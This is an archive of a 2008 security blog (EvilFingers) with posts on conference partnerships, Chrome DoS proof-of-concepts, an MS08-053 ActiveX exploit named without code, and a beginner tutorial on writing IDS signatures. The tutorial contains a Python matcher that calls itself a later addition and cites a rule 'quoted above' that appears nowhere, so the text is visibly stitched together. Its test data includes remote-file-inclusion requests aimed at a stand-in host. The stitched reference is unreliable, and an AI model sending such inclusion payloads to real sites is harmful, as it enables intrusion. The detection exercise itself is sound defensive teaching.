We now have a patchTuesday Proof-of-Concept release page for the helpers to release 0days on patchTuesdays. John Smith just released an 0day in this section. For more, click here.
- EF
Sunday, September 28, 2008
Saturday, September 27, 2008
XCon joined EvilFingers Media Partner List
Hi readers,
We are proud to announce that XCON is our new MEDIA partner. We are glad that our media partners have increased starting from the great magazine Hakin9 and now pairing with the great conferences such as DeepSec 2008, HITB 2008, POC 2008 and now XCon 2008. POC is offering free admissions to EvilFingers team too.
If you have any questions regarding these conferences, feel free to contact the conference teams. They are the most active and genuinely welcoming community we have ever seen.
Contact us at contact.fingers (@) gmail.com if you have any other questions.
- EF
Friday, September 26, 2008
Welcome John Smith!!!
John Smith is the new guy in the EvilFingers community. He is now working on the patchTuesday page of the EvilFingers community portal, and he has done some interesting studies on the most recent patchTuesday.
Ion Visser is collaborating with Mr. Smith to analyze the PoC that he is coming up with for the pT page. This will be released soon at www.EvilFingers.com.
- EF
EvilFingers made the news once again
ZDNET has published a blog post on the Google Chrome POC released by EvilFingers on the 23rd Sep 2008. This is the second consecutive DoS released at EvilFingers. Aditya K Sood (Founder of Secniche Security), Team lead of EvilFingers, has released the Google Chrome Carriage Return Null Object Memory Exhaustion Remote DoS. The first Google Chrome POC was also released by EvilFingers, by Rishi Narang, and it also made the news at ZDNET.
EvilFingers is proud to have such team leads who could inspire the whole team and is also thanking the media for all their support. Thanks to Dancho for considering the postings on EvilFingers.
- EF
Thursday, September 25, 2008
Microsoft New Downloads: Un-patched
I was researching some Microsoft stuff & patches and downloaded the Media Encoder software. I was worried about the fact that it would be "patched" and I would have to look for an "un-patched" version to get my hands on the vulnerable wmex.dll (9.0.0.2980).
After installing it, I was surprised to see it had a *.2980 version instead of a patched one! Then I downloaded the patch, extracted the files and got the newer *.3359 version. I don't know much about the corporate policies, but I feel any software by Microsoft should be a "newer" version, especially after the Patch Tuesday vulnerability exposure!
To me it surely came as a shock in a "goodish" way ;)
/best wishes/
- Ion
Wednesday, September 24, 2008
Second Google Chrome POC
The second POC for Google Chrome, released by an EvilFingers Team lead yesterday, still spikes processor and memory utilization and crashes Chrome.
The advisory can be found here.
Warning!!! This is for educational use only.
- EF
Tuesday, September 23, 2008
To EvilFingers Team
Power Of Community (POC) 2008 is offering an extended welcome to the EvilFingers team. This conference is going to be held in Korea. Details are available at POC2008. Right now, the EvilFingers Team gets free registration for this conference. Kindly contact contact.fingers {at} gmail.com to get the ticket.
- EF
Networking = Job + Pay + Talent
The world is changing for the worse. People in our field (InfoSec) are relying on "networking" more than on proven skills. The first question that comes to one's mind is "Whom do you know?" rather than "What (or how) do you know?". This is a very bad trend in the long run. Some people call it a method of attaining trust. But isn't this the model (transitivity) that caused failure in trust and multiple gaps in the same?
Is this going to change in a while or will this never change?
- EF
Sunday, September 21, 2008
MS08-053 – Windows Media Encoder wmex.dll ActiveX Control Buffer Overflow Analysis Report
Haluznik released MS08-053 Windows Media Encoder wmex.dll ActiveX Control Buffer Overflow at the milw0rm website. Ion from EvilFingers has released the analysis document on the patchTuesday (pT) section of the website.
Read n' Enjoy!!! Let us know if you have any comments or questions @ contact.fingers {at} gmail.com.
- EF
Saturday, September 20, 2008
Call for Reviewers - Kris Kaspersky's Second Edition on Disassembling Uncovered
Kris Kaspersky is writing his book and releasing it on EvilFingers, as mentioned in the previous posting "Welcome Kris Kaspersky!!!". We are looking for a language-and-flow review committee and a technical review committee.
If you wish to contribute or if you have any questions regarding this reviewer position, kindly contact contact.fingers {at} gmail.com.
- EF
The Exploit Lab 3.0 Comes to Hack in The Box
Buffer overflows and remote exploits still remain the most wondrous and devastating of attacks. For years, security analysts have been playing with exploits that yield them a rootshell. The Exploit Laboratory brings the "rocket science" of reverse engineering and exploit writing into an easy to understand two day class at Hack In The Box 2008. Started by Saumil Shah of Net-Square and S.K. Chong of Scan Associates, the Exploit Laboratory has been taught at Blackhat, Hack in the Box, CanSecWest and many other security conferences worldwide to sold-out audiences.
The class' popularity lies in the fact that it brings the concepts down to easy hands-on examples featuring real life software as opposed to contrived textbook examples. Participants begin with simple overflows on Windows and Linux and are brought up to speed with exception handler overwrites, heap overflows, exploiting toolbars on IE7, bypassing Vista ASLR, and more, featuring recent software vulnerabilities out in the wild.
For the first time this year, the Exploit Laboratory features hands on Mac OS X exploitation. Saumil and S.K. strive to keep the class current. Things have come a long way since the class was first offered in early 2006. The Exploit Laboratory has kept pace with the times, with a continually updated syllabus and up-to-date examples of vulnerabilities.
It entirely depends upon the participants how much they wish to absorb out of the class. Both instructors are highly experienced security professionals with over nine years of experience in the industry, many public contributions, books and papers. The format of the Exploit Laboratory is "learn as you play along". Participants are expected to bring their own laptops to class. Everything happens hands-on.
The Exploit Laboratory requires its participants to sign a code of ethics agreement to promote vulnerability discovery and responsible disclosure.
Some comments from past students on The Exploit Laboratory:
Garrett Gee writes: "Wow, what a weekend I just had. I just finished the exploit laboratory class with Saumil Shah and S.K. Chong at Black Hat USA 2007. We covered exploit topics like stack and heap overflows on linux and windows systems. At the end of the course, I think we developed ten exploits for various applications. I loved their teaching format of explaining the exploit concept, then stepping us through a real exploit, and then letting us do one ourselves. A major difference from the ImmunitySec course I took a few years ago was that they told us how to make the application crash in the first place. This saved lots of time and allowed us to focus on how to gain full control of the application, and how to pack our payloads."
http://garrettgee.com/2007/07/30/black-hat-exploit-laboratory/
Tate Hansen writes: "If you want to bump up your exploit writing skills – Saumil Udayan Shah is an excellent teacher. His style of teaching brought out memories of my time as an ECE student at CU, Boulder. He presented very clearly, kept the pace moving, and quipped often. Great class. The majority of time is spent on using GDB and WinDBG to inspect Intel 32-bit x86 CPU registers for opportunities. The end game was always accompanied by netcat and metasploit (along with a decent amount of scripting to facilitate quick retries when trying to line up all the exploit code to ensure success)."
http://blog.clearnetsec.com/articles/2006/08/07/the-exploit-laboratory-class-at-blackhat-training-was-great
More details on the class can be found on the Hack In The Box 2008 conference page at: http://conference.hitb.org/hitbsecconf2008kl
- EF
MS08-053: Analysis Report
As speculated by most of us about 'Exploit Wednesday', not much has been witnessed since the September Patch Tuesday, and it's going to be 2 weeks now. There was an exploit released on MS08-053, as posted before. This surely is an interesting read for all web application lovers, as it triggers via a simple ActiveX control and a "GetDetailsString" method.
For the last few days I was a little busy, but I will release an analysis report in the next 24 hrs with some technical details about "wmex.dll" and the vulnerability information. So, stay in touch.
/best-wishes/
Friday, September 19, 2008
Sandnet - www.EmergingThreats.net
The EmergingThreats Sandnet collects tons of new stuff. The latest blog post from Matt Jonkman is really interesting. It discusses an exploit that creates a MySQL connection, logs in, and finally downloads the malicious binaries. More on this can be found at MySQL Command and Control.
- EF
Hack In The Box (HITB) Security Conference 2008 - Malaysia
The following was displayed in the official HITB website:
Welcome to the official homepage of HITBSecConf2008 - Malaysia. The main aim of our conference is to enable the dissemination, discussion and sharing of deep knowledge network security information. Presented by respected members of both the mainstream network security arena as well as the underground or black hat community, our events routinely highlight new and ground-breaking attack and defense methods that have not been seen or discussed in public before.
HITBSecConf2008 - Malaysia will be our 6th conference in Malaysia and is expected to attract over 1000 attendees from around the Asia Pacific region and from around the world. This year’s event will also see the introduction of a third track to our conference program called the HITB Labs. These new hands-on sessions are designed to give attendees a closer and deeper understanding of various security issues from physical security bypass methods to the security of RFID and other wireless based technologies.
HITBSecConf2008 - Malaysia will also see our highly popular team-based hacking competition known as Capture The Flag. First developed and presented at Defcon in the US, the idea behind a CTF competition is to allow for teams of three to hack into prepared servers running in order to retrieve marked files or flags on these target machines. Participants will also be required to defend their systems from attack. Teams will be judged on both their defensive as well as the offensive game play.
We believe HITBSecConf is an ideal platform for leading network security vendors to not only meet with some of the leading network security specialists but to also showcase their own technology and solutions with the public as well.
Thursday, September 18, 2008
DeepSec2008
DeepSec is an annual European two-day in-depth conference on computer, network, and application security. It is a non-product, non-vendor-biased conference, and its aim is to present the best research and experience from the field's leading experts. The conference program will be augmented with a live hacking competition and a team capture the flag contest.
The DeepSec In Depth Security Conference is happy to announce the preliminary schedule for this year's event from November 11th to 14th in Vienna, Austria.
The schedule, which can be found at https://deepsec.net/schedule, offers leading edge talks from international speakers on topics including botnet analysis, web application security, malware detection, legal and administrative issues, secure coding and code review, hardware and firmware attacks, and more.
Registration is open at: https://deepsec.net/register/
In addition to the two day conference we offer two days of in-depth workshops on selected topics:
‣ Improving Code with Destructive Data (Heikki Kortti and Jukka Taimisto)
‣ Security Audit and Hardening of Java based Software (Marc Schoenefeld)
‣ The Exploit Laboratory (Saumil Udayan Shah)
‣ Design and Implementation of Security Awareness Campaigns (Stefan Schumacher)
‣ Advanced Malware Deobfuscation (Scott Lambert)
‣ Protocol and Traffic Analysis for Snort Signature (Matt Jonkman)
‣ Secure Application Coding for Enterprise Software (Vimal Patel)
List of speakers with presentations:
‣ Achim Reckeweg ; Sun Microsystems ; Germany
‣ Alex Stamos ; iSEC Partners ; USA
‣ Alexander Kornbrust ; Red Database Security GmbH ; Germany
‣ Andrea Monti ; Studio Legale Monti ; Italy
‣ Arrigo Triulzi ; Independent Security Consultant ; Italy
‣ Chema Alonso, José Parada ; Informática 64 ; Spain
‣ Daniel Mende, Simon Rich ; ERNW GmbH ; Germany
‣ Dr. Anton Chuvakin ; LogLogic, Inc ; USA
‣ Haroon Meer ; SensePost ; South Africa
‣ Heikki Kortti and Jukka Taimisto ; Codenomicon Ltd ; Finland
‣ Jason Steer ; IronPort, a division of Cisco Systems ; UK
‣ Joe Stewart ; SecureWorks ; USA
‣ José Nazario ; Arbor Networks ; USA
‣ Kurt Grutzmacher ; Pacific Gas & Electric ; USA
‣ Luciano Bello ; CITEFA/Si6 , Debian Project ; Argentina
‣ Marc Schoenefeld ; University of Bamberg ; Germany
‣ Matt Jonkman ; Emerging Threats.net (formerly bleedingthreats.net) ; USA
‣ Morgan Marquis-Boire ; Security-Assessment.com ; New Zealand
‣ Neelay S. Shah ; Foundstone Inc., A Division of McAfee ; USA
‣ Paolo Perego ; Spike Reply srl, Owasp Orizon Project leader ; Italy
‣ Peter Panholzer ; SEC Consult Unternehmensberatung GmbH ; Austria
‣ Rafael Dominguez Vega ; MWR InfoSecurity ; UK
‣ Saumil Udayan Shah ; CEO, Net-Square ; India
‣ Scott Lambert, Jason Geffner ; Microsoft, NGSSoftware Ltd. ; USA
‣ Sharon Conheady ; Ernst & Young ; UK
‣ Shreeraj Shah ; Blueinfy Solutions ; India
‣ Simon Roses Femerling ; Microsoft ; Spain
‣ Stefan Schumacher ; Kaishakunin.com ; Germany
‣ Stefano Zanero ; Politecnico di Milano TU
‣ Claudio Criscione ; SecureNetwork Srl ; Italy
‣ Vimal Patel ; Founder & Director, Blueinfy Solutions Pvt. Ltd. ; India
‣ Vincenzo Iozzo ; Secure Network ; Italy
‣ Yarochkin Fedor/Meder Kydyraliev ; guard-info ; Kyrgyzstan
‣ Yiannis Pavlosoglou ; Ounce Labs / PhD, OWASP Project Leader ; United Kingdom
‣ fukami ; SektionEins GmbH ; Germany
DeepSec Organisation Team.
https://deepsec.net/contact
- EF
Wednesday, September 17, 2008
Security @ its core - The Human Factor
Kevin Mitnick was and is a remarkable hacker who really demonstrated the human factor in the world of information security. There are many other books and movies that explain the same. Why is it still a major factor in insecurity? Well, this has been the case for almost 10,000 years, that is, ever since humans started trying to keep their things for themselves.
Security is not required if people do not want to keep things for themselves. If countries shared all their wealth, and if people let anyone come into their house and did not account for any products or property they have, then security would not be essential in such an environment. But that is not human. That is when security comes into place in various forms.
Social engineering has played a great role in pointing out the human factors and weaknesses in information security. Having read and seen this in many articles, why is there still no such thing as complete security? Because humans by nature have weaknesses and ties to something or someone that is valuable to them. For example, people with secret or top-secret clearance do not share their work or work-related data with any of their family members, since the first thing a bad guy would go after is someone or something valuable to you, which could put the nation's security in jeopardy. In general, reconnaissance and scanning are part of social engineering, while enumeration is the phase in which you put the meaningful parts together.
Does this mean that people in InfoSec or cyberwarfare should not have any family ties or ties to anything valuable to them, or does it mean that information security can never be complete as long as it involves a human? Think about it...
- EF
Tuesday, September 16, 2008
Do HATS change with coloring schemes?
White, black and (white+black)/2 are the three hats known so far in the security community. Hollywood has played a great role in building creativity on both sides of hacking. Now, when it comes to what humans think, what we might assume is that if a website is dark in color, with a coloring scheme based on a black background, then it is a black hat site, and the same for white and gray.
Does this really hold good for every website? If we have a site with a white background, does that mean we have a trustworthy site? How does the 'human factor' affect the perception of who is good and who is bad based on appearance? Doesn't "appearances are deceptive" hold good in this case too?
Well, this post was not meant to give the semantics of the hats, but just to give a general idea for people to start thinking about classifying hats. What we would suggest is to have two classifications, "Good" and "Bad", and forget about black, white and gray hats.
- EF
Microsoft Windows WRITE_ANDX SMB command handling Kernel DoS
In reference to: http://www.vallejo.cc/proyectos/vista_SMB_write_DoS.htm
It was released 2 days back, so I tried to validate it with my setup. I am running Microsoft Vista with SP1 at the target. On execution from the Metasploit framework it did 'nothing' on the service. I have yet to install the "kartoffel" to validate the analysis.
According to the advisory released: "A condition exists with srv.sys and npfs.sys wherein a specially crafted WRITE ANDX SMB packet may cause a kernel Denial Of Service."
I have already mailed about this to "Vallejo" and hope to get a reply soon. Here is a snapshot of the exploit in execution.
Monday, September 15, 2008
Signature Writing - 102
As mentioned in the previous post, we look for some repeated, common content in the malicious packets, once we are sure that it can only appear in malicious packets. But what are false positives and false negatives in this case? If "This is" is not specific to malicious packets alone and the same trace can also be seen in good data, then a hit on it is a false positive: our signature would trigger alerts not only on the bad data but on the good data too. Now, if the combination of "This is" and "." is not seen in the same packet, then our signature might not trigger an alert even though the packet is malicious. This is a false negative.
Sunday, September 14, 2008
Signature Writing - 101
Writing signatures has always been fun and fabulous. Prerequisites for signature writing include research and analysis of the core content that has to be detected or prevented when it enters the network. Let us start with a simple sample.
Consider the following content(s) to be malicious:
1. This is where I was born.
2. This is what we are looking for.
3. This is good.
Imagine the above to be malicious and find out what is common in all of them. "This is" repeats in every line. Hence, that could be added as content 1, to be filtered or detected. Now let us see which other parts are repeated. "." appears at the end of each line, so that could be content 2. If we want to avoid some false positives, we could require that "." follows "This is" in every content. Now imagine that this line is not sent in a single packet but is split into bits and pieces. That would evade our signature, right? This is how fragmentation can help in IDS evasion. Though this does not mean that there is no workaround for stopping such an evasion from happening.
We will be looking more into signatures and logs in the forthcoming blogs. Thank you for reading our blog.
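The "This is" / "." sample above and the ET site_conf.php rule from the earlier post, as an added example that is not part of the original blog: a constructed toy matcher (not Snort, not the EmergingThreats code) that checks content strings with nocase and ordering, counts false positives and negatives over constructed sample traffic, and shows why a per-packet matcher misses a fragmented payload while stream reassembly before matching does not.

```python
from dataclasses import dataclass

@dataclass
class Rule:
    """A tiny subset of a Snort-style rule: content strings plus nocase/ordering."""
    name: str
    contents: list
    nocase: bool = False   # case-insensitive match, like Snort's 'nocase'
    ordered: bool = False  # each content must follow the previous one (like 'distance:0')

def matches(rule: Rule, payload: str) -> bool:
    """True when every content string of the rule is present in this one payload."""
    hay = payload.lower() if rule.nocase else payload
    pos = 0
    for c in rule.contents:
        needle = c.lower() if rule.nocase else c
        idx = hay.find(needle, pos if rule.ordered else 0)
        if idx < 0:
            return False
        pos = idx + len(needle)
    return True

def classify(rule: Rule, samples) -> dict:
    """samples: (payload, is_malicious) pairs. Count TP/FP/TN/FN for the rule."""
    counts = {"tp": 0, "fp": 0, "tn": 0, "fn": 0}
    for payload, bad in samples:
        hit = matches(rule, payload)
        counts[("tp" if bad else "fp") if hit else ("fn" if bad else "tn")] += 1
    return counts

def fragmented_match(rule: Rule, payload: str, pieces: int):
    """Split the payload into N packets; return (per-packet hit, reassembled hit)."""
    size = -(-len(payload) // pieces)  # ceiling division
    frags = [payload[i:i + size] for i in range(0, len(payload), size)]
    per_packet = any(matches(rule, f) for f in frags)  # naive: no reassembly
    reassembled = matches(rule, "".join(frags))        # stream reassembled first
    return per_packet, reassembled

# The '101' rule: "This is" followed by "." in the same payload.
THIS_IS_RULE = Rule("this-is-dot", ["This is", "."], ordered=True)

# The two uricontent matches of ET sid:2003705, both nocase (rule text as quoted above).
ET_RFI_RULE = Rule("ET WEB TellTarget site_conf.php ordnertiefe",
                   ["/site_conf.php?", "ordnertiefe="], nocase=True)

# Constructed sample traffic (payload, is_malicious); not captured data.
SAMPLES_101 = [
    ("This is where I was born.", True),
    ("This is good.", True),
    ("This is fine", True),                        # no "." -> false negative
    ("Hello. This is a benign greeting.", False),  # benign text -> false positive
    ("Nothing to see here", False),
]
SAMPLES_ET = [
    ("GET /site_conf.php?ordnertiefe=http://example.invalid/inc.txt HTTP/1.1", True),
    ("GET /SITE_CONF.PHP?ORDNERTIEFE=http://example.invalid/inc.txt HTTP/1.1", True),
    ("GET /site_conf.php?ordnertiefe=2 HTTP/1.1", False),  # site's own use -> false positive
    ("GET /index.php?page=home HTTP/1.1", False),
]

if __name__ == "__main__":
    print("101 rule:", classify(THIS_IS_RULE, SAMPLES_101))
    print("ET rule :", classify(ET_RFI_RULE, SAMPLES_ET))
    print("'This is good.' split into 2 packets:",
          fragmented_match(THIS_IS_RULE, "This is good.", 2))
```

The uppercase request in SAMPLES_ET is only caught because of nocase; drop that flag from the rule and the same request becomes a false negative.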
- EF
Saturday, September 13, 2008
MS08-053 - Exploit released in milw0rm
MS08-053 states that a vulnerability in Windows Media Encoder 9 could allow remote code execution. Haluznik, an exploit writer, published an MS08-053 exploit on the milw0rm website.
In this exploit, the writer used the "GetDetailsString" method of the ActiveX class "clsid:A8D3AD02-7508-4004-B2E9-AD33F087F43C" in an ActiveX control buffer overflow PoC against wmex.dll in Windows Media Encoder.
Kindly, check out the milw0rm website for more details on the exploit.
- EF
Friday, September 12, 2008
A new approach for DNS bug - Dan Kaminsky
Educating the security community alone isn't enough. Dan Kaminsky is now trying other approaches to spread the word on DNS to the general public, by making a video on DNS updates with his niece (Ms. Sarah). It is a pretty cool video, found here:
Sarah on DNS
-EF
Wednesday, September 10, 2008
Botnet Page - nectarGrid Project
A subsection of the nG project is our botnet listings. These botnets are listed in the rules section of the EmergingThreats website. What we plan to do is create a list of these IPs, grouped from the rules, and find the relationship between them and the other botnet C&C IPs around the world. This is not a short-term effort and hence it is good to start at the very beginning. We would then analyze these IPs based on open information such as:
- Whois
- IPBlock
- ReverseDNS
- Web Banner
- RWhois
- DNS Graph
We have just started with this page. Some of the sites that have been involved in such efforts are:
Shadow Server
Honeynet
Nepenthes
EmergingThreats
and a few others. We would like to acknowledge them for all their contributions to this community, our community.
- EF
Welcome Kris Kaspersky!!!
Kris Kaspersky, sole author of 7 different books on reverse engineering, disassembling and debugging, and a known security blog writer, has now joined EvilFingers.
He will be running www.EvilFingers.ru and will also contribute many articles and books (both English and Russian) to our portal. To start with, he is publishing his next book "Hacker Disassembling Uncovered - Second Edition" through EvilFingers.
NOTE: EvilFingers does NOT reserve the copyrights for this book and per Kris Kaspersky, anyone can download, publish or share any of the chapters published here.
Though there are many versions of the same book seen in outside postings, Kris Kaspersky has personally mentioned to EvilFingers that we would do the final review before publishing the final version of the book.
- EF
Geek Alert: Dan Kaminsky on the DNS Bug of 2008
Dan Kaminsky has given a serious talk to our security community. This is pretty serious, though some sites stated otherwise in their blogs or forums. Hence Mr. Kaminsky, who has been doing serious research on DNS since 2004 or so, has released a video to express the seriousness of this DNS bug.
Though DNS bugs have existed since the 1990s, why are there still bugs at this level? Are immediate patches postponing such vulnerabilities every time, or are they really fixing them? We hope to see someone talk about the long-term fixing of such DNS bugs.
Kindly take a few minutes of your time and view the following video to understand the seriousness of this bug:
http://in.youtube.com/watch?v=B0dHDD9fFM4&feature=related
PS: This is our NEUTRAL view of the video and we are no way related to the video or the speaker.
- EF
Monday, September 8, 2008
CSS/Web Designer
We are looking for CSS personnel who could help our team with a simple design. We prefer not to use any automated tools for developing the site; we are looking for someone who can work with plain Notepad. We believe we can avoid unwanted code by hand-coding whatever we can.
Web Design & Website Development
- CSS Personnel
- Animations Specialist
- Content Management Specialist
- Web Designer
Let us know if you wish to volunteer and we will see what we can do for you. We have a volunteer page listing all positions. We do not expect you to help us full-time, though we would need commitment to a certain level to complete the projects as quickly as possible, so as not to leave the site partially done.
- EF
Patch Tuesday
Microsoft releases security patches on the second Tuesday of each month. "Exploit Wednesday", named after "Patch Tuesday", is a term coined by exploit writers who analyze these patches to find more vulnerabilities and write exploits. Even though these exploit writers are writing exploits against such vulnerabilities, they are helping Microsoft by performing free analysis and vulnerability exposure.
EvilFingers is planning to bring out a page on Patch Tuesday and Exploit Wednesday analysis. We only wish to maintain a balance in the field of information security. If you (our reader) are willing to contribute to any of our projects, you are most welcome to contact us at contact.fingers {at} evilfingers.com.
The Microsoft Technet Security Page is where we can find the security listings on the vulnerabilities identified by Microsoft. September 9, 2008 is their next Patch Tuesday release. Check it out when you get a chance, as there is always something interesting in there.
- EvilFingers
Sunday, September 7, 2008
Certification & Accreditation - Does it really work?
Certification & Accreditation (C&A) is a well-known myth used by organizations to prove that they are certified and accredited. Does this really certify that the organization is secure and that there is no data breach? DataLossDB lists several data loss incidents and gives users many options to get their search results. This depends on the process used by a C&A group to certify a company. If C&A personnel are going to carry a checklist asking questions such as "Does the company have rogue access points?", and if they are going to look around for stuff or ask the local manager such questions, then the results will never be real. Is the company NOT going to keep itself clean when it knows it is to be audited this week or next week?
The best solution would be to perform vulnerability analysis without prior notice to the organization. That would really help the company to know how secure it really is and whether it is really worth a C&A. Though this is not practical in real life, we really wish that it would happen soon. This is performed by some organizations around the world, and they have been protecting themselves against the real attackers. A real attacker would never give prior notice before an attack, and neither should the good guys if they are to really certify an organization.
- EF
Saturday, September 6, 2008
Client-Side Exploits
EvilFingers.com has taken its time in concentrating on client-side exploits. This does not mean that we wear different hats or that we use them for malicious purposes. Anushree, team lead for client-side exploits, has written an article on client-side exploits that will be published in November 2008 in Hakin9. This article covers an introduction to the making and working of client-side exploits, a clear classification of client-side exploits, and their mitigation techniques.
Ion and Anushree are now planning to write a second version of the same article, involving more in-depth analysis and research on client-side exploits. We (www.EvilFingers.com) have noticed that we should concentrate on the exploits in particular, rather than the semantics behind them, as we believe that each exploit has its own importance.
The trend in exploits was first seen against servers and server software. Then the exploit writers concentrated on the client-server side and targeted web-based applications (webapps). Now we see the trend moving towards client-side software. Even though this trend has been seen since 2005, it has increased exponentially and we now have 100s to 1000s of exploits a day. 1000s may sound exaggerated, though what we mean is that we see a great increase in client-side exploits, and hence we wanted to throw some light on it. Milw0rm has a great listing of client-side exploits.
Please do leave your comments at contact.fingers {at} evilfingers.com. We do appreciate both good and bad comments as we believe that every single comment is important for us.
- EvilFingers
Friday, September 5, 2008
Media Support
Though the security community is a bit reserved, some organizations do anything to get into the media. EvilFingers did nothing and yet we are in the media. Thanks to the media for their support; we love you guys and you definitely rock. We thank you for all your support in publishing our efforts. Do not hesitate to contact us at contact(dot)fingers (at) evilfingers.com if you have any questions or comments for us.
Just an FYI, the following are noteworthy listings:
- http://blogs.zdnet.com/security/?p=1847
- http://www.informationweek.com/news/internet/google/…
- http://news.cnet.com/8301-1009_3-10031250-83.html
- http://www.cio.com/article/447276/Early_Security_Issues…
- http://www.vnunet.com/vnunet/news/2225318/security-world…
- http://www.securiteam.com/securitynews/5TP010UPFU.html
- http://www.pcworld.com/article/150639/.html
- http://www.pcadvisor.co.uk/news/index.cfm?newsid=103910
Thanks to everyone once again, for supporting us in all our efforts.
- EF
Thursday, September 4, 2008
Hello Readers
Welcome to EvilFingers.com official blog!!!
We represent www.EvilFingers.com, to spread the word and share our thought process with the security community. We would like to introduce ourselves to you (our blog reader).
Ion Visser and Anushree Reddy will be the bloggers of this blog from here on. Thank you so much for visiting our blog.
- EvilFingers